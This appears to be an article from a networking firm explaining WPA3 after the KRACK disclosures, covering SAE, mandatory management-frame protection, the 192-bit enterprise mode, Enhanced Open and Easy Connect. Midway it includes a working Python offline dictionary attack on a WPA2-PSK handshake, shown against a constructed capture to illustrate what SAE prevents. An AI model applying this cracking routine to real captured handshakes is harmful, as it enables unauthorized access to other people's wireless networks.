+421 917 978149 kalata@pksoftware.sk

At the end of last year (2017), vulnerabilities in the WPA and WPA2 handshakes were published under the abbreviation KRACK (Key Reinstallation Attacks). These events accelerated the creation of new methods for secure access to and communication in Wi-Fi wireless networks, which the Wi-Fi Alliance published under the name Wi-Fi Protected Access 3 (WPA3).

WPA3 was designed to close the weaknesses that KRACK exposed in WPA2 using current cryptographic methods, while adding some interesting functionality that the previous version of WPA did not have. Note that KRACK itself was fixed by patching the four-way handshake implementations in clients and access points, and WPA3 still uses that four-way handshake after its new authentication step, so patched clients and access points remain necessary even on WPA3 networks.

From a technical point of view, we distinguish two versions of WPA3:

  • WPA3-Personal – designed for homes or small Wi-Fi networks
  • WPA3-Enterprise – designed for business deployments in networks that also use an AAA (Authentication, Authorization and Accounting) server, typically RADIUS, to verify access to the business network.

WPA3-Personal:

From the user's point of view it builds on the same foundation as WPA2: the user still connects with a shared password (pre-shared key, PSK) known to both the client and the Wi-Fi infrastructure, and the connection procedure does not change. Under the hood, however, WPA3-Personal replaces the direct use of the PSK with Simultaneous Authentication of Equals (SAE), defined in IEEE 802.11-2016. SAE adds a password-authenticated key exchange (the commit/confirm exchange of the Dragonfly handshake) before the four-way handshake. The pairwise master key is derived from that exchange, not from the passphrase and SSID alone, so a captured handshake can no longer be used for offline dictionary or brute-force attacks: an attacker gets at most one online password guess per exchange, which the access point can rate-limit, and a passphrase that is later compromised does not expose previously captured traffic (forward secrecy). Another plus is that WPA3 requires Protected Management Frames (PMF), i.e. integrity protection of robust management frames such as deauthentication and disassociation, which blocks the spoofed deauthentication frames used to kick clients off a network. Under WPA2, PMF was an optional feature that an administrator may or may not have enabled on the Wi-Fi network. PMF support is needed both on the Wi-Fi infrastructure and on the Wi-Fi clients that connect to the network.
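To make the "offline dictionary attack" point concrete, here is an added example (not code from the original article) that reproduces the WPA2-Personal key derivation and the attack against it. The SSID, MAC addresses, nonces and the EAPOL-Key frame are constructed inline so the block runs offline; the derivations themselves (PBKDF2-SHA1 for the PMK, PRF-512 for the PTK, HMAC-SHA1 for the MIC) are the ones IEEE 802.11 specifies for WPA2-PSK with AKM 00-0F-AC:2. The passphrase "sunshine123" and the wordlist are assumptions for the demonstration.

```python
"""Offline dictionary attack on a WPA2-PSK four-way handshake (added example)."""
import hashlib
import hmac
from typing import Optional

# Constructed "capture" parameters; an attacker reads all of these from the air.
SSID = "HomeNet"
AA = bytes.fromhex("001122334455")   # authenticator (AP) MAC, constructed
SPA = bytes.fromhex("66778899aabb")  # supplicant (client) MAC, constructed
ANONCE = bytes(range(0, 32))         # real nonces are random; fixed here for the example
SNONCE = bytes(range(32, 64))

# EAPOL-Key layout: 4-byte 802.1X header, then descriptor type(1), key info(2),
# key length(2), replay counter(8), nonce(32), IV(16), RSC(8), ID(8), MIC(16), key data len(2).
MIC_OFFSET = 4 + 1 + 2 + 2 + 8 + 32 + 16 + 8 + 8   # = 81
MIC_LEN = 16


def pmk_from_passphrase(passphrase: str, ssid: str) -> bytes:
    """WPA2-Personal PMK = PBKDF2-HMAC-SHA1(passphrase, SSID, 4096 iterations, 32 bytes).
    Everything in the derivation except the passphrase is public."""
    return hashlib.pbkdf2_hmac("sha1", passphrase.encode(), ssid.encode(), 4096, 32)


def prf_512(key: bytes, label: bytes, data: bytes) -> bytes:
    """IEEE 802.11 PRF-512: HMAC-SHA1(key, label || 0x00 || data || i) for i = 0..3, 64 bytes."""
    blocks = (hmac.new(key, label + b"\x00" + data + bytes([i]), hashlib.sha1).digest()
              for i in range(4))
    return b"".join(blocks)[:64]


def derive_ptk(pmk: bytes, aa: bytes, spa: bytes, anonce: bytes, snonce: bytes) -> bytes:
    """PTK from the PMK and the four public handshake values; the first 16 bytes are the KCK."""
    data = min(aa, spa) + max(aa, spa) + min(anonce, snonce) + max(anonce, snonce)
    return prf_512(pmk, b"Pairwise key expansion", data)


def eapol_mic(kck: bytes, frame: bytes) -> bytes:
    """MIC over the EAPOL-Key frame with its MIC field zeroed (HMAC-SHA1, first 16 bytes)."""
    zeroed = frame[:MIC_OFFSET] + b"\x00" * MIC_LEN + frame[MIC_OFFSET + MIC_LEN:]
    return hmac.new(kck, zeroed, hashlib.sha1).digest()[:MIC_LEN]


def build_msg2(kck: bytes, snonce: bytes) -> bytes:
    """Message 2 of the handshake as the client sends it (key data omitted for brevity)."""
    body = (b"\x02"                      # descriptor type: RSN
            + b"\x01\x0a"                # key info: HMAC-SHA1-128 MIC, pairwise, MIC present
            + b"\x00\x00"                # key length
            + (1).to_bytes(8, "big")     # replay counter
            + snonce + b"\x00" * 16 + b"\x00" * 8 + b"\x00" * 8   # nonce, IV, RSC, ID
            + b"\x00" * MIC_LEN + b"\x00\x00")                     # MIC placeholder, key data length
    frame = b"\x02\x03" + len(body).to_bytes(2, "big") + body      # 802.1X v2, type EAPOL-Key
    return frame[:MIC_OFFSET] + eapol_mic(kck, frame) + frame[MIC_OFFSET + MIC_LEN:]


def make_capture(passphrase: str) -> dict:
    """What a passive sniffer obtains from one client association (constructed here)."""
    kck = derive_ptk(pmk_from_passphrase(passphrase, SSID), AA, SPA, ANONCE, SNONCE)[:16]
    return {"ssid": SSID, "aa": AA, "spa": SPA, "anonce": ANONCE, "snonce": SNONCE,
            "eapol": build_msg2(kck, SNONCE)}


def crack_wpa2_handshake(capture: dict, wordlist) -> Optional[str]:
    """Offline attack: recompute the MIC for every candidate passphrase and compare it with
    the sniffed one. No further contact with the network is needed; this is what SAE removes."""
    target = capture["eapol"][MIC_OFFSET:MIC_OFFSET + MIC_LEN]
    for guess in wordlist:
        kck = derive_ptk(pmk_from_passphrase(guess, capture["ssid"]), capture["aa"],
                         capture["spa"], capture["anonce"], capture["snonce"])[:16]
        if hmac.compare_digest(eapol_mic(kck, capture["eapol"]), target):
            return guess
    return None


CAPTURE = make_capture("sunshine123")   # assumed weak passphrase of the constructed network
WORDLIST = ["password", "letmein", "sunshine123", "qwerty123"]   # constructed wordlist

if __name__ == "__main__":
    print("recovered passphrase:", crack_wpa2_handshake(CAPTURE, WORDLIST))
```

The attacker's loop only uses values that are sent in the clear plus candidate passphrases, which is why tools can test millions of guesses per second against a single WPA2 capture. With SAE the PMK is derived from the shared secret of the Dragonfly exchange, and the random values each side mixes into its commit never leave the device, so a sniffed commit/confirm pair cannot be checked against a guess offline; every guess costs a fresh exchange with the access point.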

WPA3-Enterprise:

It is based on WPA2-Enterprise (802.1X/EAP authentication against the AAA server) and, like WPA3-Personal, WPA3-Enterprise also requires support for Protected Management Frames (PMF).

WPA3-Enterprise also introduces an optional 192-bit security mode. This mode complies with the Commercial National Security Algorithm (CNSA) Suite recommendations and is intended mostly for high-security deployments in government, financial and industrial institutions. It consists of the following components:

  • Authenticated encryption: 256-bit Galois/Counter Mode Protocol (GCMP-256)
  • Key derivation and confirmation: Hashed Message Authentication Code with SHA-384 (HMAC-SHA384)
  • Key establishment and authentication: Elliptic Curve Diffie-Hellman (ECDH) exchange and Elliptic Curve Digital Signature Algorithm (ECDSA) on a 384-bit elliptic curve (P-384)
  • Robust management frame protection: 256-bit Broadcast/Multicast Integrity Protocol with Galois Message Authentication Code (BIP-GMAC-256)

The strength has to be consistent end to end: the EAP method (in practice EAP-TLS) must negotiate a TLS cipher suite of matching strength and use certificates with corresponding key sizes, otherwise the 192-bit mode is not actually achieved.

The other two areas that the Wi-Fi Alliance focused on alongside WPA3, published as separate certification programs, were:

  • Security in so-called "open" Wi-Fi networks, i.e. networks that require no authentication for connection at the link layer and at the same time do not encrypt the user data transmitted over the Wi-Fi network. Wi-Fi Enhanced Open, based on Opportunistic Wireless Encryption (OWE, RFC 8110), gives each client an individually encrypted link by means of an unauthenticated Diffie-Hellman exchange; this stops passive eavesdropping but not an active attacker who sets up a rogue access point with the same network name.
  • Simple and fast onboarding of IoT (Internet of Things) devices, typically without a display or keyboard, onto Wi-Fi networks (Wi-Fi Easy Connect, based on the Device Provisioning Protocol, DPP, where a device is provisioned for example by scanning its QR code with a configurator such as a phone).